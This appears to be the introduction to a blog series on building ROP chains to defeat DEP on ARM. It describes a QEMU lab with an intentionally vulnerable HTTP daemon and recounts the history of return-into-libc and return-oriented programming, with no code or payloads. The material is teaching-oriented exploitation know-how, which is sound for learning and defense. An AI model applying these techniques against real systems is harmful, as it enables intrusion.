Building ROP chains
This series is about exploiting simple stack overflow vulnerabilities using return oriented programming (ROP) to defeat data execution prevention - DEP. There are three posts in this series. The posts got pretty dense, there is a lot of stuff to understand. If you miss anything, find bugs (language / grammar / ...), have ideas for improvements or any questions, do not hesitate to contact (via Twitter or contact page) me. I am happy to answer your questions and incorporate improvements in this post.
Latest Update of this series: 07.09.2018
- 07.09.2018: Added note to successfully set up the bridge interface with qemu (in the first part)
In the first part I describe the setup I used, which includes a set of script to build a QEMU based ArchLinux ARM environment and a vulnerable HTTP daemon, which is exploited during this series.
In the second part I try to explain the general idea of ROP chains, ROP gadgets and how to chain them to achieve a goal. ROP theory!
In the third part we will get into the nitty-gritty details of a ROP chain. I will explain where and how to find gadgets, how and where to place the ROP chain. In the end we will have regained back the permissions DEP took from us!
... on the shoulders of giants (ROP history)
There are thousands of great blogs, videos, tutorials, papers and magazines out there. Many great minds publish, write, draw and record stuff, make it freely available for everyone. Never in history it was that easy to learn something – just invest some time and effort. I also had the opportunity to enjoy a great and recommendable training by @therealsaumil on ARM exploitation during BlackHat this year - you can find infos, resources and a ROP challenge at his blog.
I can't name all of the great minds who influenced me over the years without forgetting somebody. There is a lot of great work on ROP on different platforms. A incomplete list of resources you want to consider reading in parallel to, after or before reading my post, would be:
1997 Solar Designer published the first "return-into-libc" buffer overflow exploit. In these days parts of the stack just got non-executable: funnily enough,
it was also Solar Designer who posted the patch for the Linux Kernel, just to publish months later a way to circument his own patch. Also the term
"Return oriented Programming" was not yet established but "return into libc" was used. The exploited platform way x86, so return-into-libc exploited a NX stack
by searching for the string "/bin/sh" in memory, then placing the address of the string and the address of system(), using the overflow, on the stack. Execution
got redirected to system() (via the overwritten
ret) and /bin/sh executed. He even described how to call two libc functions, the second one without parameters , since they would use the exact same space as the parameters for the first function call.
He also proposed to fix this by placing libc in regions of memory which contain a zero byte. Since most buffer overflow exploits got exploited via a overflown ASCIIZ string, that would render his version of the return-into-libc ineffective (since the address of system() would have a zero byte in it)
His paper: lpr LIBC RETURN exploit
Rafal Wojtczuk then, only some months later, extended the return-into-libc by:
- Exploiting the PLT address of libc functions, which are not in memory regions with zero bytes.
- Placing shellcode in the still executable data segment
A further improvement was released 2001 in phrack by Nergal where two methods to call multiple functions with parameters were described:
- ESP lifting - In binaries, which were compiled with
-fomit-frame-pointer, it was possible to use their special epilogie by returning to that, after calling the first function, to shift the stack pointer into higher regions (since the original task of the epilogue was to clean up its functions stack frame!) to the second functions call construct.
- pop-ret: by returning to a
many-pop; retgadget) instead of to the second function, you can
popthe arguments of the called function before further continuing with the next function. The caveat:
multiple-pop-and-retgadgets are quite rare.
- frame faking (programs compiled without
-omitframepointer): by overwriting the saved
EBPwith the next called functions frame and returning into a
LEAVE; RETgadget, the frame pointer can be moved always futher to the next called function.
Borrowed Code Chunks
With the ELF64 ABI then the parameters of a function were passed via the registers instead on the stack. This rendered the already mentioned
return-into-libc useless. Sebastian Krahmer then described the "borrowed code chunks" technique which used a gadget
(even if not yet named that) to move the value of register
rsp into the register
rdi and then
ret - executing system() again in an ELF64 ABI binary.
Return Oriented Programming
In 2007 then the term Return Oriented Programming (and gadget) was coined by H. Shacham in a paper named "The Geometry of Innocent Flesh on the Bone:Return-into-libc without Function Calls (on the x86)". He generalized the principle of return oriented programming by using "short code sequences" (ie gadgets) instead of the whole functions. He described a set of gadgets which were "turing complete by inspection", so they allowed arbitary computation.
ROP on ARM
Tim Kornau then published in 2010 his diploma thesis on ROP on ARM architectures. He nicely summarized how gadgets and ROP shellcode on ARM can be crafted. It really is one of the basis of my summary on that topic, so if you want a even deeper dive into ROP on ARM, make sure to work through his great thesis. A second must-read is the technical paper Return-Oriented Programming without Returns on ARM. It describes many of the techniques used here!
More interesting papers
A small, not complete list of publications you might want to look over:
- Alphanumeric RISC ARM Shellcode
- Code Injection Attacks on Harvard-Architecture Devices
- Return-Oriented Programming on a Cortex-M Processor
if you miss any links here, let me know!